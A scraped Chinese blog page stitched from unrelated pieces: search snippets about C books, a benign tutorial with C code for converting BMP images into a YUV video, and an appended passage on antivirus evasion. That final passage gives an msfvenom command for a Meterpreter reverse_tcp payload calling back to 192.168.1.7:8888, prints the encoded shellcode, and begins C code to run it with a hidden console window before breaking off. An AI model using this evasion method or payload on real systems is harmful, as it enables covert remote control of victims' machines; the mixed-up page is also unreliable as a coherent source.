精华内容
下载资源
问答
  • 用算法程序集(C语言描述)(第版)+源代码 第1章 多项式计算 1.1 一维多项式求值 1.2 一维多项式多组求值 1.3 二维多项式求值 1.4 复系数多项式求值 1.5 多项式相乘 1.6 复系数多项式相乘 1.7 多项式相除 1.8 ...
  • 查找 16.1 结构体数组的顺序查找 16.2 磁盘随机文本文件对分查找 16.3 有序数组的对分查找 16.4 按关键字成员有序的结构体数组的对分查找 16.5 按关键字有序的磁盘随机文本文件的对分查找 16.6 ...
  • 用于多文件的Makefile 364 使用无限数组 368 把一项任务分成模块 376 模块划分实例:文本编辑器 376 编译器 378 电子表格 380 模块设计准则 380 编程练习 380 第十九章 旧式编译器 382 K&R风格的函数 382 ...
  • 用算法程序集(C语言描述)(第版)+源代码 第1章 多项式计算 1.1 一维多项式求值 1.2 一维多项式多组求值 1.3 二维多项式求值 1.4 复系数多项式求值 1.5 多项式相乘 1.6 复系数多项式相乘 1.7 多项式相除 1.8 ...
  • 6. 熟练掌握C语言文件的各种操作。 二、问题描述 对于一个学校而言,图书馆是它的门面,是它的第二张脸。每个大学都有着代表它文化的图书馆,每个图书馆也有着它自己的历史。随着科技的发展,对图书馆的管理也变得...
  • 常用算法程序集(C语言描述)(第版) 清晰PDF版,配完整源代码。 第1章 多项式计算 1.1 一维多项式求值 1.2 一维多项式多组求值 1.3 二维多项式求值 1.4 复系数多项式求值 1.5 多项式相乘 1.6 复系数多项式...
  • 第1章 多项式的计算 1.1 一维多项式求值 1.2 一维多项式多组求值 1.3 二维多项式求值 1.4 复系数多项式求值 1.5 多项式相乘 1.6 复系数多项式相乘 1.7 多项式相除 ...16.6 磁盘随机文本文件的字符串匹配
  • 常用算法程序集(c语言描述) 绝对的pdf+源文件 (两者皆有) 用算法程序集(C语言描述)(第版)+源代码 第1章 多项式的计算 1.1 一维多项式求值 1.2 一维多项式多组求值 ...16.6 磁盘随机文本文件的字符串匹配
  • 现场共有个目击者,但都没有记住车号,只记下车号一些特征。甲说:牌照前两位数字是相同;乙说:牌照后两位数字是相同,但与前两位不同;丙是个数学家,他说,四位车号刚好是一个整数平方。请根据以上...
  • C语言也能干大事 全部板书

    热门讨论 2011-08-08 14:35:18
    在以前大家用TurboC写程序一般也就是一个文件,但是用C语言程序时候不可能把所有代码都写在一个文件中,肯定要写很多文件。“工程(Project)”就是这些问题一个集合。)在“工程名”中写入你为这个工程...
  • (9) 数据库系统的三级模式分别为______模式、内部级模式与外部级模式。 答:概念#概念级 (10) 数据字典是各类数据描述的集合,它通常包括5个部分,即数据项、数据结构、数据流、______和处理过程。 答:数据存储 ...
  • c语言教程(原书第4版)》一个鲜明特色就是结合大量示例描述c语言的重要特征,并对很多工作代码给出了逐步分析,以这种独特教学方法向读者解释新接触编程元素及一些惯用法。  《c语言教程(原书第4版)》...
  • (41) 在下列选项中,哪个不是一个算法一般应该具有基本特征(C) A. 确定性 B. 可行性 C. 无穷性 D. 拥有足够情报 (42) 希尔排序法属于哪一种类型排序法(B) A.交换类排序法 B.插入类排序法 C.选择类排序法 D.建...
  • 目录将多个BMP文件转为一个YUV文件一、相关概念介绍1、BMP格式和YUV格式介绍(1)BMP格式(2)YUV格式二、实验实现思路1、实验整体思路2、BMP转为RGB3、RGB转为YUV色差信号、具体程序实现四、实验结果及分析 ...

    将多个BMP文件转为一个YUV文件

    一、相关概念介绍

    1、BMP格式和YUV格式介绍

    (1)BMP格式

    BMP(Bitmap-File) 位图图像, 亦称为点阵图像,区别于矢量图放大不失真的特征,位图图像是由单个像素点组成,放大后会失真。它是 Windows操作系统中的标准系统中的标准图像,是Windows环境中交换与图有关的数据的一种标准。BMP文件属于自包含文件,包含表格中四个部分。BMP 文件的图像深度可选 lbit、4bit、8bit、16bit及24bit 。

    位图文件可看成由4个部分组成:位图文件头(bitmap-file header)、位图信息头(bitmap-information header)、彩色表(color table)和定义位图的字节(位图数据,即图像数据,Data Bits 或Data Body)阵列,它具有如下所示的形式

    结构名称 符 号 功能
    位图文件头 (bitmap-file header) BITMAPFILEHEADER 包含 BMP图像文件的类型、显示内容等信息
    位图信息头 (bitmap-information header) BITMAPINFOHEADER 包含有BMP图像的宽、高压缩方法,以及定义颜色等信息
    彩色表 (color table) Palette 可选,有些位图需要调色板,有些位图需要调色板,比如真彩(24位的BMP),不需要调色板
    图像数据阵列字节(BYTE aBitmapBits) ImageData 根据位图使用的位数不同而不同,在24位图中直接使用RGB,而其他的小于24位的使用调色板中颜索引值

    (2)YUV格式

    YUV分为三个分量,“Y”表示明亮度(Luminance或Luma),也就是灰度值;而“U”和“V” 表示的则是色度(Chrominance或Chroma),作用是描述影像色彩及饱和度,用于指定像素的颜色。
    与我们熟知的RGB类似,YUV也是一种颜色编码方法,主要用于电视系统以及模拟视频领域,它将亮度信息(Y)与色彩信息(U/V)分离,没有U/V信息一样可以显示完整的图像,只不过是黑白的,这样的设计很好地解决了彩色电视机与黑白电视的兼容问题。并且,YUV不像RGB那样要求三个独立的视频信号同时传输,所以用YUV方式传送占用极少的频宽。
    YUV码流的存储格式其实与其采样的方式密切相关,主流的采样方式有三种,Y:U:V=4:4:4,Y:U:V=4:2:2,Y:U:V=4:2:0。

    二、实验实现思路

    1、实验整体思路

    1. 打开并读入BMP文件、定义变量,开辟存储空间。BMP文件中首先被读入的应该是文件头和信息头,读入之后才能根据其中给出的关于位图的宽高、bit数等信息进行开辟空间等操作。在本实验中,定义两个指针:BITMAPFILEHEADER File_header; BITMAPINFOHEADER Info_header; 分别用来获取文件头和信息头的数据。注意,这两种类型需要加<windows.h>头文件。
    2. 提取出RGB数据,写入缓冲区。不同bit的文件不同处理。24bit图可以直接取图片数据;16bit比较复杂,需要取像素数据转换成8bit彩色分量后再写入rgbBuf;8bit,4bit,1bit均需要构造调色板。需要注意的是图像数据需要倒置,具体代码见代码分析部分。
    3. 调用“RGB2YUV.h”函数实现转换,并写入新的YUV文件。生成视频时可以循环写入,每张图片素材30帧。打开方式“wb+”可以下次继续写入。
    4. 释放缓冲区,关闭文件。

    2、BMP转为RGB

    1. 读取BMP文件,得到RGB数据:判断是否为BMP文件;判断文件是否可读出;要保证BMP图像的长必须是4的倍数,宽必须是2的倍数
    2. 通过信息头得到有效位图数据在BMP图像中的位置,进而对有效数据进行读取
    3. 注意,BMP规定:位图数据自左向右、自下向上依次存放。因此注意。Index_Data是直接从BMP文件中读取的数据倒序存放的buffer,需要变为正序的,即Data
    4. 得到的Data并不一定是RGB数据,因为BMP有位深的类别。24位BMP,位图有效数据就是RGB,而16位、8位、4位、2位、1位的BMP则需要位操作,从DATA数据中“解析”出RGB数据,具体方法见下图与注释

    3、RGB转为YUV色差信号

    RGB到色差信号的转换公式如下所示:

    Y=0.2990R+0.5870G+0.1140B
    R-Y=0.7010R-0.5870G-0.1140B
    B-Y=-0.2990R-0.5870G+0.8860B
    

    为了使色差信号的动态范围控制在0.5之间,需要进行归一化,对色差信号引入压缩系数。归一化后的色差信号为:

    U=-0.1684R-0.3316G+0.5B
    V=0.5R-0.4187G-0.0813B
    

    三、具体程序实现

    1. bmp2yuv.h
    #ifndef BMP2YUV_H_
    #define BMP2YUV_H_
    
    //定义掩码组
    typedef struct bit32Mask
    {
        unsigned int rgbRed;
        unsigned int rgbGreen;
        unsigned int rgbBlue;
        unsigned int reserved;
    }Mas32;
    typedef struct bit16Mask
    {
        unsigned int rgbRed;
        unsigned int rgbGreen;
        unsigned int rgbBlue;
    }Mas16;
    
    int BMP2RGB32bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* mask);
    int BMP2RGB24bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf);
    int BMP2RGB16bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* mask);
    int BMP2RGBNOT24bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* pRGB);
    int RGB2YUV(int x_dim, int y_dim, void* bmp, void* y_out, void* u_out, void* v_out, int flip);
    void InitLookupTable();
    void adjust(unsigned char* b, unsigned char* g, unsigned char* r, unsigned char* y, unsigned char* u, unsigned char* v);
    #endif
    
    1. RGB2YUV.c
    #include "stdlib.h"
    #include "bmp2yuv.h"
    
    static float RGBYUV02990[256], RGBYUV05870[256], RGBYUV01140[256];
    static float RGBYUV01684[256], RGBYUV03316[256];
    static float RGBYUV04187[256], RGBYUV00813[256];
    
    int RGB2YUV(int x_dim, int y_dim, void* bmp, void* y_out, void* u_out, void* v_out, int flip)
    {
        static int init_done = 0;
    
        long i, j, size;
        unsigned char* r, * g, * b;
        unsigned char* y, * u, * v;
        unsigned char* pu1, * pu2, * pv1, * pv2, * psu, * psv;
        unsigned char* y_buffer, * u_buffer, * v_buffer;
        unsigned char* sub_u_buf, * sub_v_buf;
    
        if (init_done == 0)
        {
            InitLookupTable();
            init_done = 1;
        }
    
        // 检查x_dim 和 y_dim 是否可被2整除
        if ((x_dim % 2) || (y_dim % 2)) return 1;
        size = x_dim * y_dim;
    
        //分配缓存
        y_buffer = (unsigned char*)y_out;
        sub_u_buf = (unsigned char*)u_out;
        sub_v_buf = (unsigned char*)v_out;
        u_buffer = (unsigned char*)malloc(size * sizeof(unsigned char));
        v_buffer = (unsigned char*)malloc(size * sizeof(unsigned char));
        if (!(u_buffer && v_buffer))
        {
            if (u_buffer) free(u_buffer);
            if (v_buffer) free(v_buffer);
            return 2;
        }
    
        b = (unsigned char*)bmp;
        y = y_buffer;
        u = u_buffer;
        v = v_buffer;
    
        //将RGB转为YUV
        if (!flip)
        {
            for (j = 0; j < y_dim; j++)
            {
                y = y_buffer + (y_dim - j - 1) * x_dim;
                u = u_buffer + (y_dim - j - 1) * x_dim;
                v = v_buffer + (y_dim - j - 1) * x_dim;
    
                for (i = 0; i < x_dim; i++) {
                    g = b + 1;
                    r = b + 2;
                    adjust(b, g, r, y, u, v);
                    b += 3;
                    y++;
                    u++;
                    v++;
                }
            }
        }
        else {
            for (i = 0; i < size; i++)
            {
                g = b + 1;
                r = b + 2;
                adjust(b, g, r, y, u, v);
                b += 3;
                y++;
                u++;
                v++;
            }
        }
        // 对 UV 二次抽样
        for (j = 0; j < y_dim / 2; j++)
        {
            psu = sub_u_buf + j * x_dim / 2;
            psv = sub_v_buf + j * x_dim / 2;
            pu1 = u_buffer + 2 * j * x_dim;
            pu2 = u_buffer + (2 * j + 1) * x_dim;
            pv1 = v_buffer + 2 * j * x_dim;
            pv2 = v_buffer + (2 * j + 1) * x_dim;
            for (i = 0; i < x_dim / 2; i++)
            {
                *psu = (*pu1 + *(pu1 + 1) + *pu2 + *(pu2 + 1)) / 4;
                *psv = (*pv1 + *(pv1 + 1) + *pv2 + *(pv2 + 1)) / 4;
                psu++;
                psv++;
                pu1 += 2;
                pu2 += 2;
                pv1 += 2;
                pv2 += 2;
            }
        }
        free(u_buffer);
        free(v_buffer);
        return 0;
    }
    
    void InitLookupTable()
    {
        int i;
    
        for (i = 0; i < 256; i++) RGBYUV02990[i] = (float)0.2990 * i;
        for (i = 0; i < 256; i++) RGBYUV05870[i] = (float)0.5870 * i;
        for (i = 0; i < 256; i++) RGBYUV01140[i] = (float)0.1140 * i;
        for (i = 0; i < 256; i++) RGBYUV01684[i] = (float)0.1684 * i;
        for (i = 0; i < 256; i++) RGBYUV03316[i] = (float)0.3316 * i;
        for (i = 0; i < 256; i++) RGBYUV04187[i] = (float)0.4187 * i;
        for (i = 0; i < 256; i++) RGBYUV00813[i] = (float)0.0813 * i;
    }
    
    void adjust(unsigned char* b, unsigned char* g, unsigned char* r, unsigned char* y, unsigned char* u, unsigned char* v)
    {
        float temp = 0;
        temp = (float)(RGBYUV02990[*r] + RGBYUV05870[*g] + RGBYUV01140[*b]);
        temp = temp > 235 ? 235 : temp;
        temp = temp < 16 ? 16 : temp;
        *y = (unsigned char)temp;
    
        temp = (float)(-RGBYUV01684[*r] - RGBYUV03316[*g] + (*b) / 2 + 128);
        temp = temp > 240 ? 240 : temp;
        temp = temp < 16 ? 16 : temp;
        *u = (unsigned char)temp;
    
        temp = (float)((*r) / 2 - RGBYUV04187[*g] - RGBYUV00813[*b] + 128);
        temp = temp > 240 ? 240 : temp;
        temp = temp < 16 ? 16 : temp;
        *v = (unsigned char)temp;
    }
    
    1. BMP2RGB.c
    #include "stdlib.h"
    #include "bmp2yuv.h"
    #include <windows.h> 
    #include <math.h> 
    
    int BMP2RGB32bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* mask)
    {
        long i;
        unsigned char* bmp, * rgb;
        Mas32* mas;
        long size = x_dim * y_dim;
        bmp = (unsigned char*)bmpbuf;
        rgb = (unsigned char*)rgbbuf;
        mas = (Mas32*)mask;
    
        if (mask == NULL)
        {
            for (i = 0; i < size; i++)
            {
                *(rgb + 0) = *(bmp + 0);
                *(rgb + 1) = *(bmp + 1);
                *(rgb + 2) = *(bmp + 2);
                rgb += 3;
                bmp += 4;
            }
            return 0;
        }
        else
        {//根据掩码确定RGB比特位
            int Gkey, Bkey, Rkey;
            if (mas->rgbGreen == 0)
                Gkey = 0;
            else if (mas->rgbGreen == 0xFF000000)
                Gkey = 3;
            else if (mas->rgbGreen == 0xFF0000)
                Gkey = 2;
            else if (mas->rgbGreen == 0xFF00)
                Gkey = 1;
            else
                return 1;
    
            if (mas->rgbBlue == 0)
                Bkey = 0;
            else if (mas->rgbBlue == 0xFF000000)
                Bkey = 3;
            else if (mas->rgbBlue == 0xFF0000)
                Bkey = 2;
            else if (mas->rgbBlue == 0xFF00)
                Bkey = 1;
            else
                return 1;
    
            if (mas->rgbRed == 0)
                Rkey = 0;
            else if (mas->rgbRed == 0xFF000000)
                Rkey = 3;
            else if (mas->rgbRed == 0xFF0000)
                Rkey = 2;
            else if (mas->rgbRed == 0xFF00)
                Rkey = 1;
            else
                return 1;
    
            for (i = 0; i < size; i++)
            {
                *(rgb + 0) = *(bmp + Bkey);
                *(rgb + 1) = *(bmp + Gkey);
                *(rgb + 2) = *(bmp + Rkey);
                rgb += 3;
                bmp += 4;
            }
            return 0;
        }
    
    }
    
    int BMP2RGB24bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf)
    {
        long i;
        unsigned char* rgb;// raw;
        unsigned char* bmp;
        long size = x_dim * y_dim;
        rgb = (unsigned char*)rgbbuf;
        bmp = (unsigned char*)bmpbuf;
        for (i = 0; i < size * 3; i++)
        {
            *(rgb + i) = *(bmp + i);
        }
        return 0;
    }
    int BMP2RGB16bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* mask)
    {
        long loop;
        unsigned char* Data, * rgbDataOut;
        long size = x_dim * y_dim * bitcount / 8;
        Data = (unsigned char*)bmpbuf;
        rgbDataOut = (unsigned char*)rgbbuf;
        Mas16* mas;
        mas = (Mas16*)mask;
    
        if (mask == NULL)
        {
            for (loop = 0; loop < size; loop += 2)
            {
                *rgbDataOut = (*(Data + loop) & 0x1F) << 3;
                *(rgbDataOut + 1) = ((*(Data + loop) & 0xE0) >> 2) + ((*(Data + loop + 1) & 0x03) << 6);
                *(rgbDataOut + 2) = (*(Data + loop + 1) & 0x7C) << 1;
                rgbDataOut += 3;
            }
        }
        else//555 OR 565决定于rgbGreen的比特位
        {
            if (mas->rgbGreen == 0x07E0)
            {
                for (loop = 0; loop < size; loop += 2)
                {
                    *rgbDataOut = (*(Data + loop) & 0x1F) << 3;
                    *(rgbDataOut + 1) = ((*(Data + loop) & 0xE0) >> 3) + ((*(Data + loop + 1) & 0x07) << 5);
                    *(rgbDataOut + 2) = (*(Data + loop + 1) & 0xF8);
                    rgbDataOut += 3;
                }
            }
            else
            {
                for (loop = 0; loop < size; loop += 2)
                {
                    *rgbDataOut = (*(Data + loop) & 0x1F) << 3;
                    *(rgbDataOut + 1) = ((*(Data + loop) & 0xE0) >> 2) + ((*(Data + loop + 1) & 0x03) << 6);
                    *(rgbDataOut + 2) = (*(Data + loop + 1) & 0x7C) << 1;
                    rgbDataOut += 3;
                }
            }
        }
        return 0;
    }
    int BMP2RGBNOT24bit(int bitcount, int x_dim, int y_dim, void* bmpbuf, void* rgbbuf, void* ppRGB)//1\4\8 bit BMP
    {
        unsigned char* rgb;
        unsigned char* bmp;
        unsigned char index;
    
        bmp = (unsigned char*)bmpbuf;
        rgb = (unsigned char*)rgbbuf;
    
        int shiftCnt;
        unsigned char mask;
    
        long loop = 0;
        unsigned char* Data, * rgbDataOut;
        RGBQUAD* p;
    
        long size = x_dim * y_dim * bitcount / 8;
        Data = (unsigned char*)bmpbuf;
        rgbDataOut = (unsigned char*)rgbbuf;
        p = (RGBQUAD*)ppRGB;
        for (loop = 0; loop < size; loop++)
        {
            shiftCnt = 1;
            mask = (unsigned char)pow(2, (double)bitcount) - 1;
            mask = mask << (8 - bitcount);
            while (mask)
            {
                //索引号的确定
                index = (mask == 0xFF) ? *(Data + loop) : (*(Data + loop) & mask) >> (8 - shiftCnt * bitcount);
                *rgbDataOut = (p + index)->rgbBlue;
                *(rgbDataOut + 1) = (p + index)->rgbGreen;
                *(rgbDataOut + 2) = (p + index)->rgbRed;
                if (bitcount == 8)
                    mask = 0;
                else
                    mask >>= bitcount;
                rgbDataOut += 3;
                shiftCnt++;
            }
        }
        return 0;
    }
    
    1. main.c
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h> 
    #include <math.h> 
    #include "bmp2yuv.h"
    
    #define u_int8_t    unsigned __int8
    #define u_int       unsigned __int32
    #define u_int32_t   unsigned __int32
    
    int main(int argc, char** argv)
    {
        int count;
        BITMAPFILEHEADER File_header;
        BITMAPINFOHEADER Info_header;
        RGBQUAD* pRGB = NULL;
        FILE* bmp = NULL;
        FILE* yuvFile = NULL;
        Mas16* mask16 = NULL;
        Mas32* mask32 = NULL;
    
        u_int8_t* yBuf = NULL;
        u_int8_t* uBuf = NULL;
        u_int8_t* vBuf = NULL;
        u_int8_t* rgbBuf = NULL;
        u_int8_t* bmpBuf = NULL;
        u_int8_t* mask = NULL;
        u_int frameWidth;       
        u_int frameHeight;
        u_int bitcount;
        u_int py;
        u_int m;
        u_int8_t i;
        int sum = 0;
    
        char bmpf[][50] = {"name.bmp","class.bmp","num.bmp","pick.bmp","pic2.bmp","num1.bmp" };
        char yuvname[50] = "out_YUV.yuv";
        FILE* yuv = NULL;
        int framenumber;
    
        /* 建立RAW文件 */
        fopen_s(&yuv, yuvname, "wb+");
        if (yuv == NULL)
        {
            printf("Fail to Build yuv file\n");
            exit(0);
        }
        else
        {
            printf("Successfully exported: %s\n", yuvname);
            printf("\n");
            printf("=======================================\n");
        }
    
    
        for (i = 0; i < 6; i++)
        {
    
            count = 0;
            framenumber = atoi(argv[i + 1]);
            //打开bmp文件
            fopen_s(&bmp, bmpf[i], "rb");
            if (!bmp)
            {
                printf("cannot find the specific file %s:\n", bmpf[i]);
                exit(0);
            }
            else
            {
                printf("The input bmp file:   %s\n", bmpf[i]);
            }
            if (!framenumber)
            {
                printf("\nFrames:0\n");
                continue;
            }
            else
            {
                if (fread(&File_header, sizeof(BITMAPFILEHEADER), 1, bmp) != 1)
                {
                    printf("read file header error!");
                    exit(0);
                }
                if (File_header.bfType != 0x4D42)
                {
                    printf("Not bmp file!");
                    exit(0);
                }
             
                if (fread(&Info_header, sizeof(BITMAPINFOHEADER), 1, bmp) != 1)
                {
                    printf("read info header error!");
                    exit(0);
                }
                //  end read header
                frameWidth = Info_header.biWidth;           /* --width=<uint> */
                frameHeight = Info_header.biHeight;
                py = File_header.bfOffBits;
                bitcount = Info_header.biBitCount;
                //为输出帧建立缓冲区
                if ((frameWidth * bitcount % 8 == 0) && (frameWidth * bitcount / 8 % 4 == 0)) //DWORD 对齐
                {
                    yBuf = (u_int8_t*)malloc(frameWidth * frameHeight);
                    uBuf = (u_int8_t*)malloc((frameWidth * frameHeight) / 4);
                    vBuf = (u_int8_t*)malloc((frameWidth * frameHeight) / 4);
    
                    //为输入帧建立缓冲区
                    bmpBuf = (u_int8_t*)malloc(frameWidth * frameHeight * bitcount / 8);
    
                    //为输出帧建立缓冲区
                    rgbBuf = (u_int8_t*)malloc(frameWidth * frameHeight * 3);
    
                    if (rgbBuf == NULL || yBuf == NULL || uBuf == NULL || vBuf == NULL || bmpBuf == NULL)
                    {
                        printf("no enought memory\n");
                        exit(1);
                    }
    
    
                    while (framenumber)
                    {
                        fseek(bmp, py, SEEK_SET);
                        if (!fread(bmpBuf, 1, frameWidth * frameHeight * bitcount / 8, bmp))
                        {
                            printf("the image has problems!");
                            return 0;
                        }
                        if (bitcount == 32)
                        {
                            if (Info_header.biCompression == 0)
                            {
                                if (BMP2RGB32bit(bitcount, frameWidth, frameHeight, bmpBuf, rgbBuf, 0))
                                {
                                    printf("32bit BMP2RGB program runs error!");
                                    return 0;
                                }
                            }
                            else if (Info_header.biCompression == 3)
                            {
                                //取掩码组
                                m = 4 * 4;
                                mask32 = (Mas32*)malloc(sizeof(Mas32));
                                fseek(bmp, sizeof(BITMAPFILEHEADER) + Info_header.biSize - m, SEEK_SET);
                                fread(mask32, sizeof(Mas32), 1, bmp);
                                if (BMP2RGB32bit(bitcount, frameWidth, frameHeight, bmpBuf, rgbBuf, mask32))
                                {
                                    printf("32bit BMP2RGB program runs error!");
                                    return 0;
                                }
                            }
                        }
                        else if (bitcount == 16)
                        {
                            //16bit BMP RGB比特位根据biCompression确定
                            if (Info_header.biCompression == 0)//555
                            {
                                if (BMP2RGB16bit(bitcount, frameWidth, frameHeight, bmpBuf, rgbBuf, 0))
                                {
                                    printf("16bit BMP2RGB program runs error!");
                                    return 0;
                                }
                            }
                            else if (Info_header.biCompression == 3)
                            {
                                //取掩码组
                                m = 4 * 3;
                                mask16 = (Mas16*)malloc(sizeof(Mas16));
                                fseek(bmp, py - m, SEEK_SET);
                                fread(mask16, 1, m, bmp);
                                if (BMP2RGB16bit(bitcount, frameWidth, frameHeight, bmpBuf, rgbBuf, mask16))
                                {
                                    printf("16bit BMP2RGB program runs error!");
                                    return 0;
                                }
                            }
                        }
                        else
                        {
                            if ((py - sizeof(BITMAPFILEHEADER) - Info_header.biSize) == sizeof(RGBQUAD) * pow(2, (double)bitcount))
                            {                                                   //1、2、4、8 bit 有调色板部分
                                m = (unsigned int)pow(2, (double)bitcount);
                                pRGB = (RGBQUAD*)malloc(sizeof(RGBQUAD) * m);
                                fseek(bmp, sizeof(BITMAPFILEHEADER) + Info_header.biSize, SEEK_SET);
                                fread(pRGB, sizeof(RGBQUAD), m, bmp);
                                if (BMP2RGBNOT24bit(bitcount, frameWidth, frameHeight, bmpBuf, rgbBuf, pRGB))
                                {
                                    printf("BMP2RGB program runs error!");
                                    return 0;
                                }
                            }
                        }
                        //RGB转YUV
                        if (RGB2YUV(frameWidth, frameHeight, rgbBuf, yBuf, uBuf, vBuf, 0/*flip=0*/)) //bmp图像格式从最后一行起逐行扫描
                        {
                            printf("RGB2YUV program runs error!");
                            return 0;
                        }
                        fwrite(yBuf, 1, frameWidth * frameHeight, yuv);
                        fwrite(uBuf, 1, (frameWidth * frameHeight) / 4, yuv);
                        fwrite(vBuf, 1, (frameWidth * frameHeight) / 4, yuv);
    
                        printf("\r%d", ++count);
                        framenumber--;
                    }
                    printf("\nFrames:%u   %ux%u(%d bit)\n", count, frameWidth, frameHeight, bitcount);
                    sum += count;
                    printf("\n");
                    printf("\n");
                }
            }
        }
        printf("%dFrames YUV have been written!\n", sum);
    
      
        fclose(bmp);
        fclose(yuv);
        //清空缓存
        if (yBuf) { free(yBuf); }
        if (uBuf) { free(uBuf); }
        if (vBuf) { free(vBuf); }
        if (rgbBuf) { free(rgbBuf); }
        if (bmpBuf) { free(bmpBuf); }
        if (pRGB) { free(pRGB); }
        if (mask16) { free(mask16); }
        if (mask32) { free(mask32); }
        return 0;
    }
    

    四、实验结果及分析

    1. 程序运行结果
      在这里插入图片描述

    2. 输出文件
      用yuv viewer打开:
      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述
      可知,输出为一yuv视频文件。

    展开全文
  • 第8章 插值与逼近 8.1 一元全区间插值 8.2 一元三点插值 8.3 连分式插值 8.4 埃尔米特插值 8.5 特金逐步插值 8.6 光滑插值 8.7 第一种边界条件的三次样条函数插值 8.8 第二种边界条件的三次样条函数插值 8.9 第三种...
  • C语言通用范例开发金典.part2.rar

    热门讨论 2012-08-31 14:18:18
    范例1-93 文件的归并 269 ∷相关函数:K_Merge函数 1.6 查找 272 1.6.1 顺序表的查找 273 范例1-94 顺序表的查找 273 ∷相关函数:Search_Seq函数 1.6.2 静态树表的查找 276 范例1-95 静态树表的查找 276 ∷...
  • C语言通用范例开发金典.part1.rar

    热门讨论 2012-08-31 14:09:26
    范例1-93 文件的归并 269 ∷相关函数:K_Merge函数 1.6 查找 272 1.6.1 顺序表的查找 273 范例1-94 顺序表的查找 273 ∷相关函数:Search_Seq函数 1.6.2 静态树表的查找 276 范例1-95 静态树表的查找 276 ∷...
  • 部分“排序”(第6~11章)按章节顺序分别讨论基本排序方法(如选择排序、插入排序、冒泡排序、希尔排序等)、快速排序方法、归并和归并排序方法、优先队列与堆排序方法、基数排序方法以及特殊用途排序方法,...
  • 刚学C语言时做第一个比较“程序设计,设计了个执行文件(尴尬),包括从txt中提取数据,预处理,分类个cpp, 当然现在回头看里面存在很多瑕疵,但是初学者可拿去作参考
  • C语言tinyobjloader 用C99编写微小但功能强大仅标头wavefront obj loader。 如果您正在寻找C ++版本,请参阅 当前状态 实验性。 可以加载几何数据,还需要对材料和形状进行更多测试。 特征 单个文件,仅...
  • 本书使用编程语言是C++,但是,有C语言背景读者可以轻易地读懂部分材料。  读者如果熟练掌握C中结构或C++中类,将非常有助于本书阅读。如用于描述复杂场景图形对象结构,这些场景(如一个城堡或一架...
  • 6.3.2 数据库系统的三级模式结构 168 6.3.3 数据库的二级映像与数据独立性 169 习题 170 第7章 关系数据库系统 7.1 关系模型概述 171 7.2 关系数据结构及形式化定义 172 7.2.1 关系的形式化定义 172 ...
  • 文件的随机访问权。最后,还将学习如何使用标准的I/O方法来读取和写入字符串。 附录A:计数系统 本附录讨论八进制数、十六进制数和二进制数。 附录B:C++保留字 本附录列出了C++关键字。 附录C:ASCII字符...
  • 文件的随机访问权。最后,还将学习如何使用标准的I/O方法来读取和写入字符串。 附录A:计数系统 本附录讨论八进制数、十六进制数和二进制数。 附录B:C++保留字 本附录列出了C++关键字。 附录C:ASCII字符...
  • 文件的随机访问权。最后,还将学习如何使用标准的I/O方法来读取和写入字符串。 附录A:计数系统 本附录讨论八进制数、十六进制数和二进制数。 附录B:C++保留字 本附录列出了C++关键字。 附录C:ASCII字符...
  • 文件的随机访问权。最后,还将学习如何使用标准的I/O方法来读取和写入字符串。 附录A:计数系统 本附录讨论八进制数、十六进制数和二进制数。 附录B:C++保留字 本附录列出了C++关键字。 附录C:ASCII字符...
  • 书中涉及的内容非常广泛,包括DBMS的概念、术语和体系结构,ER模型和ER图,数据抽象和语义数据建模,UML类图表示法,基本关系模型,关系代数和关系演算,SQL,规范化,磁盘上组织记录文件的主要方法,文件的索引技术...
  • LINGO软件学习

    2009-08-08 22:36:50
    每个集成员可能有一个或多个与之有关联的特征,我们把这些特征称为属性。属性值可以预先给定,也可以是未知,有待于LINGO求解。例如,产品集中每个产品可以有一个价格属性;卡车集中每辆卡车可以有一个牵引力...
  • Payload 实现分离免杀

    2019-10-01 15:55:32
    目前杀毒软件杀毒原理主要有种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越时,越...

    众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。

    通过C语言编译后门

    1.首先使用msfvenom命令生成一句简短的shellcode,这里指定连接地址为IP=192.168.1.7,PORT=8888,当执行shellcode生成命令时屏幕会输出一些十六进制的文本,这些文本其实是机器码的编码形式,以下是对参数的解释.

    [root@localhost ~]# msfvenom -a x86 --platform Windows \
    >                              -p windows/meterpreter/reverse_tcp \
    >                              -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
    Found 11 compatible encoders
    Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 368 (iteration=0)
    x86/shikata_ga_nai chosen with final size 368
    Payload size: 368 bytes
    Final size of c file: 1571 bytes
    unsigned char buf[] =
    "\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
    "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
    "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
    "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
    "\xca\xec\x3f\xcd\x34\xa2\x40\xc4";
    
    -a              #指定payload目标框架
    --platform      #指定payload的目标平台
    -p, --payload   #指定需要使用的payload(攻击荷载)
    -f, --format    #指定输出格式 (使用 --help-formats 来获取msf)
    -b '\x00\x0b'   #规避特殊字符串

    2.将上面的ShellCode代码复制下来,打开VS Express编译器,并写以下C代码,这里使用内联汇编的形式调用这段ShellCode代码.

    #include <stdio.h>
    #include <windows.h>
    
    //#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // 隐藏控制台窗口显示
    #pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积
